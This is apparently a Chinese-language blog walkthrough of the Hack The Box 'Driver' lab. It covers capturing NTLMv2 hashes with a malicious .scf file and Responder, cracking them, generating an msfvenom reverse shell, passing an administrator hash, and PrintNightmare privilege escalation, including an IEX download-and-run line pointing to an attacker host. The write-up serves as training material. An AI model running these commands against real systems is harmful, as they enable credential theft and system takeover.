Lluna's Pure land.

What is life like when singing to wine?

0%

HTB-driver

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 5.4k 阅读时长 ≈ 5 分钟

0x00.简述

0x01.信息收集

可以看到开放了80端口及134、445等敏感端口,且-sC参数进行了smb共享文件的匿名登入,但是这台机器并没有开启!

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(root💀kali)-[~/htb/driver]
└─# nmap -sC -sV -sT -A 10.10.11.106                                                                                             1 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-09 23:50 EST
Nmap scan report for driver.htb (10.10.11.106)
Host is up (0.63s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Microsoft IIS httpd 10.0
| http-auth: 
| HTTP/1.1 401 Unauthorized\x0D
|_  Basic realm=MFP Firmware Update Center. Please enter password for admin
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|Vista|7|10 (88%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (88%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows 10 1511 - 1607 (85%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DRIVER; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h00m00s, deviation: 0s, median: 6h59m59s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-11-10T11:51:38
|_  start_date: 2021-11-10T04:56:00

TRACEROUTE (using proto 1/icmp)
HOP RTT       ADDRESS
1   711.49 ms 10.10.16.1
2   711.54 ms driver.htb (10.10.11.106)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.21 seconds

0x02.访问80端口

在访问80端口时可以发现需要登入才可以获取到资源

这里弱口令admin:admin登入成功,手动爬虫发现fw_up.php目录可以进行文件上传。

0x03.SCF(shell command file)

在上传了数小时的webshell后我放弃了。。。直到我重新思考了一下,前面收集到了445端口及web界面显示的文件共享字眼,我找到了SCF。何为SCF文件攻击

创建.scf文件,文件使用@开头是为了保持文件始终在第一位,方便读取。

1
2
3
4
5
6
7
┌──(root💀kali)-[~/htb/driver]
└─# cat @attack.scf 
[Shell]
Command=2
IconFile=\\your-ip\share\random.ico  //这里目录随便写不存在也可以,目的就是让目标来链接我从而获得目标的hash
[Taskbar]
Command=ToggleDesktop

运行Responder抓取Ntlmv2 hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
┌──(root💀kali)-[~/htb/driver/Responder-master]
└─# python2 Responder.py -wrf --lm -v -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 2.3

  Author: Laurent Gaffie (laurent.gaffie@gmail.com)
  To kill this script hit CRTL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    DNS/MDNS                   [ON]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [ON]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [ON]
    Fingerprint hosts          [ON]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.16.2]
    Challenge set              [1122334455667788]



[+] Listening for events...

上传@attack.scf即可抓取到Ntlmv2 hash,得到用户名tony

1
tony::DRIVER:1122334455667788:CAB4FB213766B6C2B128BA78CAAA28BD:0101000000000000B380F2FC5FD6D701102734F8919D620700000000020000000000000000000000

0x04.解密Ntlmv2 hash值

使用hashcat和john均可以,得到密码为liltony

1
2
3
┌──(root💀kali)-[~/htb/driver]
└─# cat hash       
tony::DRIVER:1122334455667788:CAB4FB213766B6C2B128BA78CAAA28BD:0101000000000000B380F2FC5FD6D701102734F8919D620700000000020000000000000000000000
1
hashcat -m 5600 hash --wordlist /usr/share/wordlists/rockyou.txt

0x05.漏洞利用

1.msf的auxiliary/scanner/winrm/winrm_cmd

使用auxiliary/scanner/winrm/winrm_cmd模块执行命令,但是没有成功。

2.evil-winrm.rb利用

1
./evil-winrm.rb -i 10.10.11.106 -u "tony" -p "liltony"

查看user.txt

3.反弹shell

首先生成后门文件

1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=5555 -f exe > shell.exe

上传并执行

1
*Evil-WinRM* PS C:\Users\tony\Desktop> upload /root/htb/driver/shell.exe

这里迁移进程并提权,但是没有成功

0x06.CVE-2021-1675提权

由web站点可以看到这是一个打印机网站,所以查看服务器是否开启了print spooler服务

1
Get-Service -Name Spooler

可以看到打印服务开启,接下来进行利用

1.第一种方式

CVE-2021-1675.py

首先配置smb服务,添加如下配置文件允许匿名访问

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
[global]
client min protocol = CORE
client max protocol = SMB3
map to guest = Bad User
server role = standalone server
usershare allow guests = yes
idmap config * : backend = tdb
smb ports = 445

[smb]
comment = Samba
path = /tmp
guest ok = yes
read only = no
browsable = yes
force user = smbuser

使用impacket的smbserver.py脚本开启smb服务

1
smbserver.py smb /tmp

CS生成木马,使用CVE-2021-1675.py利用浏览本机共享文件,需要将生成的木马文件放到之前设置的共享目录/tmp下

接下来浏览共享文件driver.dll即可上线。

1
python3 CVE-2021–1675.py driver.htb/tony:liltony@10.10.11.106 '\\10.10.16.5\smb\driver.dll'

得到system32权限就可以获取hash值,可以爆破NTLM值得到明文密码,也可以使用win-rm使用hash进行登入

我这里没有破解成功!

1
./evil-winrm.rb -i 10.10.11.106 -u "administrator" -H "d1256cff8b5b5fdb8c327d3b6c3f5017"

2.第二种方式

CVE-2021-1675.ps1

利用powershell脚本创建一个新的管理员用户

1
2
Import-Module .\CVE-2021-1675.ps1
Invoke-Nightmare -NewUser "demo" -NewPassword "demo"

导入模块的时候可以看到powershell脚本的执行权限为默认不执行任何脚本,接下来进行bypass

1
IEX(new-object net.webclient).downloadstring('http://your_ip/CVE-2021-1675.ps1')

成功创建用户

demo:demo登入

得到root.txt

-------------纸短情长下次再见-------------